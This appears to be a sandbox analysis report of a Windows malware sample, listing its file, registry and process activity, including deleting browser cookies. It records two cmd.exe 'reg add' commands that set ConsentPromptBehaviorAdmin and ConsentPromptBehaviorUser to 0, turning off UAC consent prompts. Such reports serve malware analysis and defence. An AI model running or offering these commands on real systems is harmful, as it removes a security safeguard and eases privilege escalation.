| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\X0MqL_ZtdkVFYJuKw90y | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Adobe\Acrobat\10.0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Adobe\ARM\Reader_10.0.0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Assistance\Client | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Crypto\DSS | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Crypto\Keys | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Crypto\RSA | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Device Stage\Device | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Device Stage\Task | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\DRM\Server | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\eHome\logs | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Event Viewer\Views | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\MSDN\8.0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Network\Connections | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Network\Downloader | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\OFFICE\UICaptions | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\RAC\Outbound | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\RAC\PublishedData | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\RAC\StateData | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\RAC\Temp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Search\Data | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\AIT | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Caches | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\DRM | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\GameExplorer | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Ringtones | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Sqm | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Start Menu | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Templates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\WER | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows Defender\Definition Updates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows Defender\LocalCopy | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows Defender\Quarantine | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows Defender\Scans | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows Defender\Support | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows NT\MSFax | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows NT\MSScan | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\WwanSvc\Profiles | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Sun\Java\Java Update | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Local\Application Data | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Local\History | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Local\Microsoft | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Local\Temp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Local\Temporary Internet Files | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\LocalLow\Microsoft | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Roaming\Identities | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Roaming\Microsoft | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Adobe\Acrobat\10.0\Replicate\Security | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tablet PC | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460\packages\Patch\x64 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Color | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Apps\2.0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\CrashReports | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Credentials | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Event Viewer | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Feeds | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Feeds Cache | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\FORMS | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\IME12 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\IMJP12 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\IMJP8_1 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\IMJP9_0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Internet Explorer | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Media Player | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Office | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Outlook | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Publisher | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\TaskSchedulerConfig | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Visio | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Media | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Sidebar | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Mozilla\Firefox | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Mozilla\updates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Cookies | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\History | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Temporary Internet Files | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\WPDNSE | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\~nsu.tmp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Linguistics | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\CryptnetUrlCache | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\IME12 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\IMJP12 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\IMJP8_1 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\IMJP9_0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Acrobat | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Flash Player | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Headlights | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\Linguistics | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe\LogTransport2 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia\Flash Player | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\AddIns | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Credentials | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Crypto | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Document Building Blocks | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Excel | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\IME12 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\IMJP12 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\IMJP8_1 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\IMJP9_0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Internet Explorer | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\MMC | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\MS Project | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Network | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Office | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Outlook | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\PowerPoint | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Proof | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Protect | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Publisher | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Publisher Building Blocks | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Speech | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\SystemCertificates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Templates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\UProof | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Word | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Extensions | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\o2dzQZNBDDx1G3 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\pIbphXFMT3WS7Z6C | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Adobe\Acrobat\10.0\Replicate | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Assistance\Client\1.0 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Crypto\DSS\MachineKeys | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Crypto\RSA\MachineKeys | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Search\Data\Applications | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Search\Data\Temp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\DRM\Cache | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Sqm\Manifest | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Sqm\Sessions | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies | type = file_attributes |
|
2 | |
| Get Info | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup | type = file_attributes |
|
2 | |
| Get Info | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies | type = file_attributes |
|
2 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\KL8pWDj.mp3 | - |
|
1 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@adobe[1].txt | - |
|
1 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@adobe[3].txt | - |
|
1 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@demdex[1].txt | - |
|
1 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt | - |
|
1 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@everesttech[1].txt | - |
|
1 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@google[2].txt | - |
|
1 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@ml314[1].txt | - |
|
1 | |
| Delete | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\5p5nrgjn0js_halpmcxz@rlcdn[2].txt | - |
|
1 | |
|
For performance reasons, the remaining 707 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (27)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | value_name = DbgJITDebugLaunchSetting, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | value_name = DbgManagedDebugger, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | value_name = Anchor Underline, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | value_name = Anchor Underline, data = yes, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 |
Process (9)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f | os_pid = 0x9c4, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 | |
| Create | cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Systemm / v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f | os_pid = 0x9cc, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOWMINIMIZED |
|
1 | |
